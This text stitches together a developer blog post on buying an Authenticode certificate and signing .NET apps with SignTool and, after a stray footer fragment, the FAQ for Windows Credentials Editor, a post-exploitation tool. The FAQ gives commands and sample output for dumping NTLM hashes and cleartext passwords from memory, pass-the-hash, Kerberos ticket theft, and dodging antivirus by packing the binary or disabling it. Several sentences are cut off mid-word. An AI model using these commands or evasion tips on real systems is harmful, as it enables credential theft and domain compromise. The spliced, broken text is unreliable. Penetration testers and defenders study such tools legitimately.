Update 3/15/10: Silverlight 4 supports code signing elevated trust .XAP files
I recently jumped in and acquired an Authenticode code signing certificate & key pair. It’s great being able to sign my .NET executables, installers, and even Visual Studio 2010 extensions.
I’m documenting my efforts here in the hope that others would be able to follow the relatively straightforward process – there’s not much magic other than learning to export and work with the certificate mechanisms inside Windows. But I know a lot of devs see it as a black magic art, and really it’s just about time, money, and some quick learning.
Which dialog would you click ‘Yes’ on?
Windows 7 is leaps and bounds ahead of Vista in terms of usability. The improved User Account Control experience is nice. I think that a lot of people are finally becoming more wary of unsigned software, especially installers.
With the net full of stories of mirror servers becoming compromised, or people blinding clicking yes on many dialogs, the assurance of the dialog without the scary orange warning banner is the one I think every software developer would like to offer their customers. It’s the professional thing to do.
So here we are, from start (no cert) to finish (signing a .NET app). It only took about two days to go through the identity verification process, but the time was well worth it – and the rest is easy given the nice signing tools in Windows and Visual Studio.
We’ll be getting a certificate & private key through a trusted root certificate authority (CA) provider, not test signing or self-signing. If you’ve ever purchased an SSL certificate for your web servers, similar process.
For a list of current program members, see
on the Microsoft site – there are hundreds of businesses and governments in the program.
Some corporate IT departments will have their own internal CA, so although those companies can sign apps for internal use, using them on machines without that CA cert installed will yield the un-trusted publisher dialog.
What is Authenticode?
Authenticode is the name for the code signing system on Windows. There are
that are core to code signing and ship in the Windows SDK.
Code signing certificates have an expiration date, but as long as a timestamp server is used when signing, signed apps can still be used and verified. Certificates can also be revoked if ever compromised.
For good measure, here’s a short Wikipedia page on , and the MSDN document “”.
What code signing is not
Signing is only a way of proving that some person or company is who they say they are. It doesn’t tell you whether there’s a nice person, or in any way validate functionality of an app.
Also, .NET projects have a “Signing” tab, but this is actually a feature called , and is different. Most commercial software products using .NET will be both strong named, plus be code signed.
What all can you use your $99/year key for?
Signing Windows executables
.NET programs, class libraries, ClickOnce apps
.MSI installer files
Adobe AIR apps
Microsoft Office/VBA macros
Mozilla objects and extensions
Signing Visual Studio extension packages (.vsix files), although SignTool doesn’t directly support this (no SIP module)
Note that only Verisign offers code signing certificates for Windows device drivers through a special program for kernel-mode code signing.
How does Microsoft do code signing?
Obviously the Microsoft corporate keys are extremely secure and private. All signing is performed through a set of intricate systems that accept builds, check conditions, scan for viruses, and who knows what else… and eventually provide the signed binaries.
It’s pretty much a black box to us as engineers, but it works for hundreds of thousands of files.
As a dev, I’ve had more than my share of wild Friday nights trying to get code strong named and signed: there’s a big process and it revolves around a lot of people, smart cards, and it eventually works out.
Step-by-step guide to purchasing a certificate
Here’s my experience with getting a certificate. Different certification companies may have different processes, but in general you can be sure that you will need to do a lot to provide proof and authenticity of your name/company.
You can purchase a personal certificate (independent developer, professional geek) quicker than a corporate certificate given the different proof requirements.
Since the name/company name is what will be shown in the publisher field, you obviously wouldn’t want to get a personal certificate for company use. Also, be aware that the address you provide to a signing company will be embedded inside the certificate.
I purchased my code signing cert through , which is an official reseller of
certificates, a popular Level 2 CA whose certificates are part of the root CA program on computers everywhere. The certificate costs $99 per year. I’ve heard of other companies sometimes offering specials as low as $65 a year, and others such as Verisign asking $499 a year.
Since there is some pain in the process (producing copious amounts of evidence) and waiting for that to be validated, you may want to consider purchasing a multi-year certificate and skip having to renew yearly.
You must use Windows and either Internet Explorer or Firefox to make the initial request. After the entire process is complete and the certificate is issued (days later), you will need to use the same computer and browser to complete the process. You will then export the certificate and private key to a file so you can store it safely somewhere.
What proof will be required
This is a partial list, the authentication process may require other documents. Most verification can be done through fax, mail, or even email.
If you’ve ever purchased an SSL certificate, it’s almost the same exact process.
Your own domain name:
The domain’s WHOIS records must match the information you provide in your order.
If you use Private Registration services, you’ll need proof from the private registration company that you own the domain and your address matches. This can be a pain.
Corporate entities:
Articles of Incorporation
Business License
Other documentation such as DUNS details
Individuals:
Driver’s license or passport
Recent utility statements with matching data
Phone statement with matching information, name, and phone number where final phone verification will be performed
This information will be asked for after you order and pay for the service. It is performed by the CA (Comodo in my case), not by the company or reseller you buy the service from.
For the remainder of this section, everything will be specific to Comodo. I found them helpful, quick and responsive, and professional, so I would definitely recommend their service. It is a great value when purchased through a reseller.
Step 1: Register with the CA to track your validation tickets and receive support
You’ll need to do this with an email address at your domain name. You register with the same email you’ll use in the next step.
If you don’t usually receive mail at your domain, you should be able to easily setup mail forwarding to your normal mail address. On a Windows server,
sets up in minutes and is great for this.
Simply create an account at Comodo Support for this:
Step 2: Submit basic data and purchase
Start at the K Software site, which is a reseller of Comodo’s:
Current prices are $99 US for one year, $198 for 2 years, and so on.
After navigating to the page, click Buy Now. Internet Explorer will pop up a message that the site is attempting to perform a digital certificate operation. Click Yes.
On the order form page, you will submit your details, including address, email, etc. The email address needs to be an email address on your domain name that can be verified, not a Hotmail or Google Mail address. Note that this information will be embedded inside the final issued certificate.
Important values at the end of the page:
CSP should be Microsoft Enhanced Cryptographic Provider v1.0 (the default)
Key size: 2048 is fine for most people
Exportable: definitely – if you don’t check this, you can’t get a PKCS 12 (.pfx on Windows) file to use for signing, and would have to do all signing on that machine
User protected: Leave this unchecked
After clicking Submit Order, you’ll go to a payment page. I used PayPal and was done in seconds.
Step Three: You’ll be contacted
At this point you’re done with the K Software order. You will be contacted via e-mail from Comodo, and they’ll step you through what verification they need at that time, and how to submit it.
In my case I had to go through several rounds of verification, including sending a recent phone bill.
I ran into some hiccups because the domain name I used for the e-mail address, though owned by me, is hard to prove: my WHOIS data all says ‘Domains By Proxy’, which is the provider of private registration services for GoDaddy. I had to find a way to provide proof that I own the domain.
The final verification step is when they eventually call your phone number. After that call, they’ll issue the certificate approval, and you’ll receive a final e-mail about 20 minutes later to go pick up the certs.
This step took me 1.5 business days including waiting time.
Step Four: Pick up your key
On the same computer you started the operation on, and same browser, click on the link provided in the e-mail Comodo sent when the key was ready.
On this page, you’ll again receive a notification about a certificate operation. That’s fine. At this point you now have the key stored in your browser certificate system.
Step Five: Export your key
This step is for Internet Explorer users. If you’re using Mozilla Firefox, .
In IE now, click Tools | Internet Options. Click on the Content tab, and then the Certificates button:
Within the Personal (first) tab of the Certificates dialog, click on the new certificate issued by UTN-USERFirst-Object (this is one of the many Comodo level 2 CAs in the Windows root CA program):
Then click ‘Export…’. In the Certificate Export Wizard, read the useless text and click Next.
Select the option ‘Yes’ for exporting the private key along with the certificate.
Next, you pick the file format. Only PFX/PKCS #12 should be available. I checked both ‘Include all certificates in the certification path if possible’ and ‘Export all extended properties’, though to be honest I haven’t a clue whether this is needed.
I wouldn’t recommend clicking the delete private key option, I like knowing that on this particular machine I can still re-export the cert as needed in the future.
Now, come up with a password to protect the file. You will need to use this password when using tools such as SignTool.exe, or setting up an automated code signing process of your own.
Finally, pick where you want your .PFX file stored.
Step Six: Protect your key
Although code signing certificates have a mechanism through the CA to revoke keys, you do not ever want to have to do this.
Take precautions. It is your duty to protect your key. Many people find ways to store this information through smart card or other physical security mechanisms.
As an individual, it’s pretty easy for me: Only I know the password, I have the file securely stored, and I don’t need to worry about sharing it with others.
Business entities and groups will have more trouble coming up with the appropriate processes and systems for this. Ideally some sort of automated system should be used to perform the code signing, with altern providing the key file and a password is not the best method.
Import Wizard Note
To manually sign on another machine, you’ll want to double-click on the .pfx file. An import wizard will open up that will allow you to install the cert and private key on your machine.
For manual signing you typically select from your private certificate store on the machine, instead of using the .pfx file directly. For automated signing, you probably will use the .pfx.
How to sign your apps and libraries
Now the fun part. Armed with your new code signing certificate and private key, you’re ready to go SignTool.exe’ing.
SignTool is included with the Windows 6.0 and 7.0A SDKs, and you’ll have it in your path if you have Visual Studio 2008 or 2010 installed and are using the associated Visual Studio Command Prompt.
You can create scripts to sign quickly using command line parameters, or even write .NET apps using types in the System.Security.Cryptography.X509Certificates namespace.
It’s easiest to get started by manually signing, using the Digital Signature Wizard. From a Visual Studio 2008 Command Prompt, for instance, run:
signtool.exe signwizard
This will popup the wizard that will walk you through.
Select the file you want to sign:
The ‘Typical’ option will let you pick from the certificate store on your machine. You don’t actually select the previously-exported .PFX file when manually signing.
Here I click ‘Select from Store…’:
Which pops up a Windows dialog listing available code signing certificates.
Here I can verify the goods:
On the next wizard page, you can optionally offer more information here as appropriate.
The last optional, but highly recommended step, is to use the timestamp server provided by the CA. This is a service that authenticates when the data (your app) was signed.
This means that your app will continue to be valid, even after the certificate expires, as long as the cert is not revoked.
For Comodo, their timestamping server is:
Click Next and you’ll see the summary of what signing is to take place.
After clicking Finish, the dialog will go away, and pretty soon you should receive a success/failure message.
CodeSign.exe Parameters
You can also code sign in scripts and the command line using arguments. For instance, here’s a sample made-up signing argument list. You can specify any number of files to sign as the final arguments.
signtool.exe sign /f PathToKeysAndCert.Pfx /p “MySuperSecretPasswordToUseThePfxFile” /v /t /authenticode “C:\MyFileToSign.exe”
For all the parameters, type ‘signtool sign /?’
That’s it!
You can use a variety of tools to check that the signing works fine, including just examining the file in the Windows explorer.
Authenticode-signed executables, MSIs and libraries will have a ‘Digital Signatures’ tab in the properties window (though not irregular file types, such as Adobe AIR files).
Here’s the .exe I signed:
   
And that’s it! Ship it!
Your customers will have that extra level of confidence when using your application. At some point, the more more professional software developers and software companies code sign, the more likely customers will be able to make proper security decisions about their computers… and the real benefit of the crisp user account control user interface comes to light.
Hope this helps. Let me know how your experiences with code signing go.
Other Posts
18 Nov 2015 &
05 Apr 2014 &
19 Sep 2013 &
Please enable JavaScript to view theAmplia Security - Research - WCE FAQ
Windows Credentials Editor (WCE) F.A.Q.
What is WCE?
Windows Credentials Editor (WCE) is a security tool that allows to list Windows logon sessions and add, change, list and delete associated credentials (e.g.: LM/NT hashes, Kerberos tickets and cleartext passwords).
The tool allows users to:
- Perform Pass-the-Hash on Windows
- 'Steal' NTLM credentials from memory (with and without code injection)
- 'Steal' Kerberos Tickets from Windows machines
- Use the 'stolen' kerberos Tickets on other Windows or Unix machines to gain access to systems and services
- Dump cleartext passwords stored by Windows authentication packages
WCE is a security tool widely used by security professionals to assess the security of Windows networks via Penetration Testing.
What is the current version?
The current version of WCE 32bit is v1.42 you can download it
and the current version of WCE 64bit is v1.42 you can download it . Since version 1.4beta there is also a "Universal Binary" which runs on both 32bit and 64 you can download it .
Who should use WCE?
WCE is aimed at security professionals and penetration testers. It is basically a post-exploitation tool to 'steal' and reuse NTLM hashes, Kerberos tickets and plaintext passwords which can then be used to compromise other machines. Under certain circumstances, WCE can allow you to compromise the whole Windows domain after compromising only one server or workstation.
What Operating Systems does WCE support?
WCE supports Windows XP, Windows 2003, Vista, Windows 7 and Windows 2008 (all SPs, 32bit and 64bit versions).
Is WCE like cachedump?
NO. Cachedump obtains NTLM credentials from the Windows Credentials Cache (aka logon cache, logon information cache, etc).
This cache can be disabled and it is very often disabled by network/domain/windows administrators (see ).
WCE will be able to steal credentials even when this cache is disabled.
WCE obtains NTLM credentials from memory, which are used by the system to perform SSO; it uses a series of techniques the author of WCE developed and published some years ago.
Also, cachedump does not allow you to perform Pass-the-hash, nor does it allow you to 'steal' and reuse Kerberos tickets.
Is WCE like pwdump?
NO. Pwdump dumps NTLM credentials from the local SAM. WCE dumps cre which are used by the system to perform SSO; it uses a series of techniques the author of WCE developed and published some years ago.
This is one of the reasons why you may be able to compromise the whole Windows domain after compromis NTLM credentials stored in memory and obtained by WCE could have been left there, for example, by Domain Administrators that connected to the server using RDP. In this scenario, pwdump will only allow you to obtain the NTLM credentials of the local SAM, that will probably be useless, since the server is not the domain controller.
Also, pwdump does not allow you to perform Pass-the-hash, nor does it allow you to 'steal' and reuse Kerberos tickets.
Is WCE like Cain & Abel?
No. WCE and Cain&Abel are two different tools with different functionality. In fact, Cain&Abel does not implement any of the functionality implemented by WCE, for example:
* It does not implement Pass-the-Hash natively in Windows
* It does not dump NTLM hashes stored in memory (it dumps local and remote SAMs, which is not the same thing. For more information read )
* It does not implement Pass-the-Ticket for Kerberos
* It does not dump cleartext logon passwords stored in memory
This does not imply WCE is a better tool, Cain&Abel also implements many things WCE does not, they are just different tools with different functionality. You should use both!
Where can I find more information about how WCE works?
"WCE Internals" presentation. RootedCon 2011; Madrid, Spain.
Where can I find information on how to use WCE on a pentest?
"Post-Exploitation with WCE" presentation, UBA 2011 - Spanish
What privileges do I need to run WCE?
You need local administrator privileges to run WCE and be able to steal
NTLM credentials from memory. This is a post-exploitation tool.
You also need local administrator privileges to perform Pass-The-Hash (change your current NTLM credentials, or launch a new program in a new Windows logon session with the NTLM credentials specified).
How do I list NTLM credentials in memory?
By default, WCE lists NTLM credentials in memory, no need to specify any options.
For example:
C:\Users\test&wce.exe
WCE v1.2 (Windows Credentials Editor) - (c)
Amplia Security - by Hernan Ochoa ()
Use -h for help.
theuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CBBF2A37
C:\Users\test&
In this case, only one user/credential set is listed. If there are more in memory, more will be displayed.
How do I change my current NTLM credentials?
wce.exe -s &username&:&domain&:&lmhash&:&nthash&
For example:
C:\Users\test&wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CBBF2A37
WCE v1.2 (Windows Credentials Editor) - (c)
Amplia Security - by Hernan Ochoa ()
Use -h for help.
Changing NTLM credentials of current logon session (00024E1Bh) to:
Username: testuser
domain: amplialabs
LMHash: 01FC5A6BE7BC6929AAD3B435B51404EE
NTHash: 0CBBF2A37
NTLM credentials successfully changed!
C:\Users\test&
How do I create a new logon session and launch a program with new NTLM credentials?
wce.exe -s &username&:&domain&:&lmhash&:&nthash& -c &program&
For example:
C:\Users\test&wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CBBF2A37 -c cmd.exe
WCE v1.2 (Windows Credentials Editor) - (c)
Amplia Security - by Hernan Ochoa ()
Use -h for help.
Changing NTLM credentials of new logon session (h) to:
Username: testuser
domain: amplialabs
LMHash: 01FC5A6BE7BC6929AAD3B435B51404EE
NTHash: 0CBBF2A37
NTLM credentials successfully changed!
C:\Users\test&
At this point, a new cmd.exe instance will be launched and network connections using NTLM initiated from that instance will use the NTLM credentials specified. Of course, you can run any program,
not just cmd.exe.
This is feature is very useful, because you can do many tests and do Pass-the-Hash with many different users without having to change your current Windows logon session and credentials.
How can I generate NTLM hashes with WCE? (for testing purposes)
wce.exe -g &cleartext password&
For example:
C:\Users\test&wce.exe -g mypassword
WCE v1.2 (Windows Credentials Editor) - (c)
Amplia Security - by Hernan Ochoa ()
Use -h for help.
mypassword
74AC99CA40DED420DC1A73E6CEA67EC5:A991AE45AA987A1A48C8BDC
C:\Users\test&
While testing WCE, and other things,
it is very common to have the need to generate LM and NT hashes from a password. This can be done using the '-g' parameter as shown above.
What is 'safe mode'?
WCE is the first and only tool that can read NTLM credentials stored by Windows in memory without injecting code. WCE is able to locate and understand the undocumented structures used by Windows to store the credentials, find encryption keys and decrypt credentials just by reading the system's memory.
This technique is very very safe (after all, the tool is thus the name 'safe mode') and tries to ensure that the system where WCE is executed will not crash. This is extremely important if you are a penetration tester and want to run WCE without risking a server crash.
WCE will automatically attempt to use this technique first when obtaining NTLM cre however it will also automatically attempt code injection if the first technique failed.
For this reason, if you want tu ensure WCE will only attempt to obtain NTLM credentials by reading memory (without code injection), you can use the -f switch (Force 'safe mode').
C:\Users\test&wce.exe -f
WCE v1.2 (Windows Credentials Editor) - (c)
Amplia Security - by Hernan Ochoa ()
Use -h for help.
theuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CBBF2A37
C:\Users\test&
Having said that, you use the tool no guarantee is given.
How can I write hashes obtained by WCE to a file?
Use the -o switch. For example:
C:\&wce -o output.txt
WCE v1.2 (Windows Credentials Editor) - (c)
Amplia Security - by Hernan Ochoa ()
Use -h for help.
C:\&type output.txt
test:AMPLIALABS:90102
How can I dump logon cleartext passwords with WCE?
The -w switch can be used to dump logon passwords stored in cleartext by the Windows Digest Authentication package. For example:
C:\>wce -w
WCE v1.3beta (Windows Credentials Editor) - (c) 12 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity com)
Use -h for help.
test\MYDOMAIN:mypass1234
NETWORK SERVICE\WORKGROUP:test
video shows the use of the -w switch in a Windows 2008 Server (watch in 720p for best quality).
How can I prevent WCE dumping my logon password in cleartext?
When you login into a W your cleartext password is handed over to all the Security Packages installed on the system. This includes the NTLM security package (msv1_0.dll) the Kerberos security package (kerberos.dll), the Digest Authentication Security Package (wdigest.dll) etc. These packages take the cleartext password and basically do what they desire with it. For example,
the NTLM security package generates and stores in memory the NTLM hashes discarding the cleartext password, and the Digest Authentication package stores in memory the cleartext password encrypted. The techniques invented by WCE precisely consist in extracting from these packages these credentials stored in memory.
For this reason, one of the ways to prevent WCE dumping your cleartext login password and other credentials is to avoid loading the Security Packages from which WCE retrieves them.
These are defined in registry at the following location:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
You will find there a list similar to the following:
You can remove an item from the list and (after rebooting) Windows will not load the corresponding Security Package.
For example, you can remove wdigest and tspkg and WCE will not be able to dump the cleartext password stored by these packages simply because they will not be loaded anymore.
Although this works, keep in mind that you may encounter problems if your environment uses one of the secur you will need to test how this affects you specifically. Also, removing fundamental security packages like msv_1_0 can have catastrophic consequences, so apply this technique at your own risk.
WCE is detected by the antivirus/HIPS. what can I do to avoid detection?
Use a PE Packer, for example . If UPX does not do the trick, try other PE Packers, there are many out there. Also, since you need administrator privileges to run WCE, try disabling the AV/HIPS before running WCE...
What is GETLSASRVADDR.EXE?
GETLSASRVADDR.exe is a tool (included with WCE) that can be used to obtain automatically the needed addresses for WCE to be able to read logon sessions and NTLM credentials from memory (without code injection) when WCE is not able to do it by itself out-of-the-box.
Addresses obtained can then be used with WCE using the -A switch.
This tool requires the DLLs symsrv.dll and dbghelp.dll available from the "Debugging Tools for Windows" package.
When should I use GETLSASRVADDR.EXE?
Basically, you should use GETLSASRVADDR.exe when you want to use
to extract hashes from memory on a system where out-of-the-box WCE is unable to make it work.
GETLSASRVADDR.exe will give you the information WCE needs to get 'safe mode' working.
I can't get GETLSASRVADDR.EXE to work. What's the problem?
The most common source of problems is that you are missing the DLL files symsrv.dll and dbghelp.dll available from the "Debugging Tools For Windows" package.
This is most likely the case if you are getting the following error message:
Connecting
symbol server...please wait..
Error: cannot find symsrv.dll
Error: Cannot obtain addresses
Read the presentation
for an explanation on why these DLLs are required.
The tool getlsasrvaddr.exe is meant to be used in the attacker's machine, and not in
so this requirement should not be an issue.
Another common issue is having UAC enabled and not being able to access c:\windows\system32\lsasrv.dll. In this case, just copy lsasrv.dll to another directory and try again.
Who's the author of WCE? Is he also the author of the PSH Toolkit?
The author of WCE is Hernan Ochoa (hernan [ at ] ); and yes, he is also the author of the now defunct Pass-The-Hash Toolkit.
How is WCE better than the PSH Toolkit?
The Pass-The-Hash (PSH) Toolkit does not work anymore. It does not support
newer updates for Windows XP and 2003; and it does NOT support Windows 7 and 2008 at all.
WCE is basically a complete rewrite form scratch, it uses new techniques and does automagically lots of things to make its use easier and to make it work automatically in more platforms. It also works perfectly with all Windows versions, including Windows 7 and 2008; and it is the only tool that is able to read credentials ju which is very important to penetration testers, since this means the chances of crashing a server when using WCE are almost zero (although neither the author nor Amplia Security guaran you use the tool at your own risk).
Also, the PSH Toolkit does not allow you to 'steal' and reuse Kerberos tickets.
(Note: remember the author of WCE is also the author of the PSH Toolkit).